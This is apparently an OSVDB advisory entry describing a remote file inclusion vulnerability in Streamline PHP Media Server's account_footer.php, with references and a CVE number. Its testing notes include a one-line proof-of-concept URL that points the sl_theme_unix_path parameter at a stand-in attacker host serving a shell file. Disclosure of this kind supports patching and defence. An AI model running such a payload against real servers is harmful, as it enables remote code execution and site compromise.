Streamline PHP Media Server account_footer.php sl_theme_unix_path Variable Remote File Inclusion

2007-09-19T00:00:00
ID OSVDB:38294
Type osvdb
Reporter OSVDB
Modified 2007-09-19T00:00:00

Description

Manual Testing Notes

http://[target]/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://[attacker]/shell.txt?

References:

Related OSVDB ID: 38290 Related OSVDB ID: 38293 Related OSVDB ID: 38295 Related OSVDB ID: 38291 Related OSVDB ID: 38292 Other Advisory URL: http://arfis.wordpress.com/2007/09/14/rfi-03-streamline-php-media-server/ ISS X-Force ID: 36683 Generic Exploit URL: http://www.milw0rm.com/exploits/4430 CVE-2007-5015 Bugtraq ID: 25736